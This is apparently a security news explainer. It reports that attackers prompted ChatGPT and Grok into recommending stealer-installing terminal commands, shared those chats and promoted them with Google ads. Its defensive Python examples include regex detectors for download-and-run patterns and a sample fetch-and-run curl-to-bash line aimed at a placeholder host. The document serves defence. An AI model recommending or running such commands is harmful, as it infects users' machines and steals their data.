Cybercriminals have found a way to weaponize AI chatbots such as ChatGPT and Grok. They coax the assistants into recommending malware installation commands, then push those conversations to the top of Google search results. Security researchers at Huntress uncovered the technique, in which attackers manipulate public AI conversations so that malicious instructions reach unsuspecting users directly. Because the advice arrives from familiar brands rather than through a suspicious download, it sidesteps traditional security warnings and exploits users’ trust in major tech companies to install data-stealing malware.

The Attack Mechanism Exposed



Attackers begin by asking popular AI assistants about common technical problems, such as “clear disk space on Mac.” Through carefully crafted prompts, they steer the AI into recommending terminal commands that look helpful but actually install malware such as AMOS (Atomic macOS Stealer), a data-stealing tool that targets Macs. The attackers then make these conversations public and promote them through Google ads, so the links appear at the top of search results.

When victims search for a legitimate fix, they find what looks like authoritative advice from a trusted AI brand. Users without terminal experience copy and paste the command without scrutiny, which installs the stealer and gives attackers access to their data. Huntress confirmed that both ChatGPT and Grok reliably reproduced the malicious instructions during testing, showing that the attack is not tied to a single platform.
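Part of why such commands pass casual inspection is that a one-liner can hide its real payload. The sketch below assumes the command conceals a download-and-execute step in a base64 string, a common obfuscation trick; it is not a reconstruction of the actual AMOS command. The helper `reveal_base64`, the 16-character threshold, and the placeholder domain `example.invalid` are all hypothetical. The function decodes base64-looking tokens so a reader can see what would really run.

```python
import base64
import binascii
import re

# Hypothetical heuristic: runs of 16+ base64 characters (plus optional '='
# padding) are treated as candidate hidden payloads.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def reveal_base64(command: str) -> list[str]:
    """Decode base64-looking tokens in a shell command and return those that
    decode to printable text, exposing what the command would actually run."""
    revealed = []
    for token in B64_TOKEN.findall(command):
        try:
            decoded = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore this token
        if decoded.isprintable():
            revealed.append(decoded)
    return revealed


# Hypothetical one-liner: the visible text only mentions echo, base64 and bash.
hidden = base64.b64encode(b"curl -fsSL https://example.invalid/cleanup.sh | bash").decode()
one_liner = f'echo "{hidden}" | base64 -d | bash'

for payload in reveal_base64(one_liner):
    print("This command would actually run:", payload)
```

A heuristic like this only catches one obfuscation style; a command can hide its intent in many other ways, which is why reading the decoded result matters more than the decoder itself.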

Why This Attack Is So Effective

Traditional phishing relies on suspicious downloads, unfamiliar executables, or dubious links, all red flags that security training teaches users to spot. This AI-driven vector removes those red flags entirely:

– No file downloads required

– Commands appear to come from reputable AI brands

– Google search placement builds instant credibility

– Terminal execution seems like legitimate troubleshooting

Victims trust these sources implicitly: ChatGPT’s status as a household name and the authority of a top Google result combine to create a perfect storm of misplaced confidence. Even security-savvy users might run such a command during routine maintenance.

Real-World Impact and Response Lag

Huntress documented a live AMOS infection that originated from this exact method. Alarmingly, the malicious ChatGPT link promoted through Google ads remained active for at least 12 hours after Huntress published its report, extending the window in which users could be exposed. The delay underscores how hard it is for security researchers, AI providers, and search engines to coordinate a takedown.

The attack exploits a structural weakness in how AI platforms share content: a public conversation becomes a persistent web page that search engines and ad placements can amplify. Once indexed, malicious instructions remain available until someone removes them manually, so the threat outlives the initial campaign.

AI Security Vulnerabilities Comparison

| AI Model | Attack Success (Huntress Testing) | Primary Weakness | Known Mitigation |
|---|---|---|---|
| ChatGPT | High | Public conversation persistence | Post-detection removal |
| Grok | High | Terminal command generation | Limited public controls |
| Gemini | Untested | Search integration risks | Enterprise filtering |

Broader Implications for AI Trust

This incident arrives amid credibility problems for both platforms. Grok faces criticism for responses biased toward its creator, while ChatGPT contends with competitive pressure on its market position. Weaponized prompt engineering can turn these services from helpful tools into unwitting malware distribution channels, undermining public confidence in generative AI.

The attack highlights systemic vulnerabilities:

– Lack of conversation visibility controls

– Inadequate command validation filters

– Search engine amplification of AI content

– Insufficient cross-platform threat intelligence
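To make the “command validation filters” gap concrete, a provider could screen answers for risky command shapes before they are displayed or shared. The sketch below is a minimal, hypothetical line-by-line check: the rule names, the regular expressions, and the `flag_risky_lines` helper are assumptions for illustration, not any vendor’s actual safeguard, and the sample answer uses the placeholder domain `example.invalid`.

```python
import re

# Hypothetical rule set: command shapes that a routine "free up disk space"
# answer should almost never need.
RISK_RULES = {
    "remote script piped to a shell": re.compile(
        r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "decoded data piped to a shell": re.compile(
        r"\bbase64\s+(-d|-D|--decode)\b[^;&]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "AppleScript dialog (possible password prompt)": re.compile(
        r"\bosascript\b.*\bdisplay dialog\b", re.IGNORECASE),
}


def flag_risky_lines(response: str) -> list[tuple[str, str]]:
    """Return (line, reason) pairs for each line of an AI answer that matches
    a risk rule. Lines are checked independently of one another."""
    findings = []
    for raw in response.splitlines():
        # Drop surrounding whitespace, inline-code backticks and a "$ " prompt.
        line = raw.strip().strip("`").removeprefix("$ ").strip()
        for reason, pattern in RISK_RULES.items():
            if pattern.search(line):
                findings.append((line, reason))
    return findings


answer = """To see how much space caches use, run:
du -sh ~/Library/Caches
Then run the cleanup helper:
`curl -fsSL https://example.invalid/cleanup.sh | bash`"""

for line, reason in flag_risky_lines(answer):
    print(f"BLOCK ({reason}): {line}")
```

Pattern rules like these are easy to evade, for example by splitting a command across shell variables, so they would complement model-level safeguards rather than replace them.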

Immediate Protection Strategies

Users should treat AI-generated technical advice with heightened vigilance:

– Never execute terminal commands from search results

– Verify instructions through official documentation

– Use virtual machines for testing suspicious commands

– Enable browser extensions blocking command injection

– Cross-reference AI advice with multiple trusted sources

Security teams should implement endpoint detection for common stealer malware signatures and monitor corporate Google search traffic for anomalies.
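One narrow starting point for monitoring search traffic is to flag visits to shared AI conversations that arrive from a paid ad click. The sketch below rests on several labeled assumptions: that proxy logs record the full URL and referrer, that shared chats live under `/share/` on `chatgpt.com` and `grok.com`, and that ad clicks can be recognized by Google’s `gclid` auto-tagging parameter or a `googleadservices.com` referrer. The function name and log entries are hypothetical.

```python
from urllib.parse import parse_qs, urlparse

# Assumed URL prefixes for publicly shared AI conversations.
SHARED_CHAT_PREFIXES = {
    "chatgpt.com": "/share/",
    "grok.com": "/share/",
}
# Assumed referrer hosts that indicate a Google ad-click redirect.
AD_REFERRER_HOSTS = {"www.googleadservices.com", "googleadservices.com"}


def is_ad_driven_shared_chat(url: str, referrer: str = "") -> bool:
    """True when a request lands on a shared AI conversation via an ad click."""
    parsed = urlparse(url)
    prefix = SHARED_CHAT_PREFIXES.get(parsed.hostname or "")
    if prefix is None or not parsed.path.startswith(prefix):
        return False  # not a shared-chat page we are watching
    tagged_ad_click = "gclid" in parse_qs(parsed.query)
    ad_referrer = (urlparse(referrer).hostname or "") in AD_REFERRER_HOSTS
    return tagged_ad_click or ad_referrer


# Hypothetical proxy log entries: (user, url, referrer).
proxy_log = [
    ("alice", "https://chatgpt.com/share/abc123?gclid=XYZ", "https://www.google.com/"),
    ("bob", "https://chatgpt.com/share/def456", "https://example.org/blog"),
    ("carol", "https://grok.com/share/ghi789", "https://www.googleadservices.com/pagead/aclk"),
]

for user, url, referrer in proxy_log:
    if is_ad_driven_shared_chat(url, referrer):
        print(f"review: {user} opened an ad-promoted shared chat: {url}")
```

A match is a lead for review, not proof of compromise; in practice it would be correlated with endpoint alerts from the same machine.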

The Arms Race Escalates

Attackers continuously adapt their tactics to exploit emerging technologies: yesterday’s phishing emails become today’s AI-poisoned search results. This attack shows how threat actors can exploit legitimate infrastructure, including Google’s ad platform, the models from OpenAI and xAI, and public trust, to devastating effect.

AI companies face urgent pressure to implement conversation moderation, command sanitization, and takedown protocols with search engines. Google, for its part, must tighten its review of promoted results so that verified technical content outranks sponsored AI chats. Without coordinated defenses, any public AI conversation can become a malware vector.

Future of Secure AI Interactions

This incident accelerates demands for enterprise-grade AI controls: sandboxed conversations, command execution previews, and real-time threat scanning. Consumers deserve transparency about which AI outputs influence search rankings, along with automated safety checks before any suggested command reaches the terminal.
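A command execution preview could be as simple as splitting a suggested one-liner into its pipeline stages and annotating each program before the user runs it. The sketch below uses Python’s standard `shlex` tokenizer; the `preview` function and its small table of notes are hypothetical, and a real preview would need far broader coverage of programs and shell syntax.

```python
import shlex

# Shell operators that separate one stage of a command line from the next.
SEPARATORS = {"|", "||", "&&", ";", "&"}
# Hypothetical, deliberately small table of programs worth a warning.
NOTES = {
    "curl": "downloads data from the network",
    "wget": "downloads data from the network",
    "bash": "runs whatever text it receives as a script",
    "sh": "runs whatever text it receives as a script",
    "zsh": "runs whatever text it receives as a script",
    "base64": "encodes or decodes hidden text",
    "osascript": "runs AppleScript (can show password dialogs)",
    "sudo": "runs the rest of the stage with administrator rights",
}


def preview(command: str) -> list[str]:
    """Split a command into stages and describe what each stage would run."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # split on whitespace and shell operators only
    stages, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                stages.append(current)
            current = []
        else:
            current.append(token)
    if current:
        stages.append(current)

    lines = []
    for number, stage in enumerate(stages, start=1):
        program = stage[0]
        note = NOTES.get(program, "no note for this program")
        lines.append(f"step {number}: {program} ({note})")
    return lines


for line in preview('echo "SGVsbG8=" | base64 -d | bash'):
    print(line)
```

Showing the stages in plain language makes the final “hand the result to bash” step visible, which is exactly the step a copy-paste victim never sees.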

The malware-via-AI era has arrived. Users conditioned to trust ChatGPT’s advice must now approach it with the skepticism once reserved for email attachments. As generative models permeate daily workflows, securing human-AI interaction becomes cybersecurity’s paramount challenge—where the most dangerous code arrives not as executables, but as helpful text from brands we know and love.